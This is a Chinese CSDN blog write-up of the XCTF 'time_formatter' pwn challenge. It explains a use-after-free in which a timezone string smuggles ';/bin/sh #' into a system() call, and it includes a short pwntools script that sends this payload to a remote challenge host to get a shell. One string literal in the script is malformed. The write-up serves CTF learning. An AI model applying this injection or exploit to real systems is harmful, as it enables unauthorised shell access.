2019XCTF攻防世界之萌新入坑(time_formatter)

最新推荐文章于 2024-05-06 20:01:42 发布
最新推荐文章于 2024-05-06 20:01:42 发布
阅读量1.8k 收藏 1
点赞数 2
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44113469/article/details/89221515
版权

time_formatter

题目先给出一个菜单

在这里插入图片描述

选择1设置参数 格式化字符串
选择2设置参数 指定时间戳
选择3设置参数 时区
选择4对已有 时区参数的情况做处理
选择5退出 (可选择是否 退出)

在这里插入图片描述
选择1 malloc
在这里插入图片描述
在这里插入图片描述

选择3同样是一个malloc

选择4 一个后面,读入字符串,并作为system的参数
在这里插入图片描述
选择5 free掉ptr、value两个堆块

在这里插入图片描述
利用use after free

选择1设置 格式化字符串 (malloc(n))
选择3设置时区 (malloc(n)),传入参数/bin/sh,利用’’\将参数括起来,‘;’用来传参
选择5 退出 (选择否 , 目的是 free上面的两个块)
选择3设置时区(消耗时区 free的块)
选择4设置时区 (使用格式化字符串free的块)

在这里插入图片描述
exp

from pwn import *
r = remote("111.198.29.45", 30168)
 r.send("1" + "\n") 
r.send("%c" + "\n") 
r.send("3" + "\n") 
r.send("\'"+";/bin/sh #"+"\" + "\n") 
r.send("5" + "\n") 
r.send("\n") 
r.send("3" + "\n") 
r.send("\'"+";/bin/sh #"+"\" + "\n") 
r.send("4" + "\n") 
r.interactive()
梦回Altay
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
XCTF攻防世界web.doc
09-19
【XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
【XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
攻防世界-web-newscenter
wuh2333的博客
05-30 1079
攻防世界,sql注入
攻防世界-misc】glance-50
weixin_73625393的博客
11-28 475
由此得到flag值,拼写提交。
攻防世界-NewsCenter
最新发布
weixin_39579781的博客
05-06 1182
题目打开是有个输入框可以用来输入搜索信息,初步判断是个sql注入的题目。接下来判断能否进行sql注入:输入 hi,有搜索结果,如下图:输入hi’,无结果,如下图:初步判定是hi‘后面还有单引号,导致重复输入导致的,(单引号与服务端代码中的’形成闭合,将我们输入的字符串hello包裹,服务端代码后面多出来一个‘导致语法错误,而加入#将后面的’注释掉之后不会报错,可确定为字符型SQL注入。
攻防世界----NewsCenter(字符型SQL注入,union联合查询)
m0_70182904的博客
05-22 1814
在使用union之前需要明确:union前面查询语句查询的元素与后面查询语句查询的元素要数量上要一样,这一点可以使用order by实现(原理:order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数,但是不能多于查询的属性数)搜索框输入hello,出现与之相关的新闻内容,输入hello'之后发现网页报错,提示我们可能存在字符型SQL注入,再次输入单引号 ',发现网页再次报错,输入hello'#没有报错提示。得到表名news、secret_table。
攻防世界-MISC:glance-50题解
weixin_58112990的博客
11-08 495
使用python代码:代码参考:【向生活低头】用python提取gif动图的每一帧为png格式_gif读取 python-CSDN博客使用convert工具:于是得到200张png图片:使用montage工具
攻防世界glance-50
淡巴枯的博客
11-01 349
题目描述:无。
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
【XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
xctf.rar_HTML5自适应
09-19
这个"xctf.rar"压缩包包含了一个实现HTML5全屏滚动效果的源码,它能实现平滑滚动,并且能够自适应不同浏览器的显示。 全屏滚动,也称为全屏滑动或全景观览,是一种让网页内容以连续的全屏视图展示的设计方式。这种...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。 MISC这一块并不像PWNREVERSE等需要深厚的理论基础,所以我们直接从经典题目开始入手。
攻防世界NewsCenter
qq_45955869的博客
05-19 531
提示:攻防世界新手模式难度2NewsCenter提示:以下是本篇文章正文内容,下面案例可供参考比较基础,比较简单。
攻防世界NewsCenter
金 帛的博客
04-09 2374
攻防世界WP
攻防世界-NewsCenter-(详细操作)做题笔记
qq_43715020的博客
06-10 1899
攻防世界-NewsCenter-(详细操作)做题笔记
攻防世界-MISC:glance-50
m0_56161093的博客
01-16 1208
这是攻防世界MISC高手进阶区的题目,题目如下: 点击下载附件一,得到一张GIF动图如下 找个网站给分离一下,将git分离为图片,共201张,然后拼接在一起即可得到flag 所以这道题的flag如下: TWCTF{Bliss by Charles O’Rear} 这里附上这道题所需的在线工具链接 gif在线分离 以上就是我对这道题的解法。因本人菜鸡一只,如果有什么不对的地方,实属正常。还请各位大佬予以指正,谢谢! ...
【愚公系列】2021年11月 攻防世界-进阶题-MISC-019(glance-50)
热门推荐
时光隧道
11-02 4万+
glance-50 下载附件解压后发现是一个长的 gif 图片,先把 gif 分解开,kali 的 convert 命令可以分解图片 解开后得到200张图片 使用montage合并图片 montage flag*.png -tile x1 -geometry +0+0 flag.png 得到 flag:TWCTF{Bliss by Charles O’Rear} ...
攻防世界MISC进阶之glance-50
harry_c的博客
08-20 3388
攻防世界MISC进阶之glance-50第一步:描述第二步、实操 第一步:描述 难度系数: 2星 题目来源: mma-ctf-2nd-2016 题目描述:暂无 题目场景: 暂无 题目附件: 附件1 首先我们通过下载附件,查看是一个帧数非常多的gif图片,但是像素都十分小,使用图片查看器看不出什么端倪。猜想将每一帧提取之后拼装。 第二步、实操 通过python编程实现将glance.gif分割成对应...
攻防世界misc进阶之glance-50
胖虎很忙
11-19 1855
攻防世界misc进阶之glance-50 (1)题目显示是一幅gif图片 (2)将gif分解成一幅图片,不多说,加上地址:,按照上面提示加入进入,将gif分解为一个个图片,就出来flag了 flag:TWCTF{Bliss by Charles O’Rear} ...
攻防世界pwn新手题答案
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值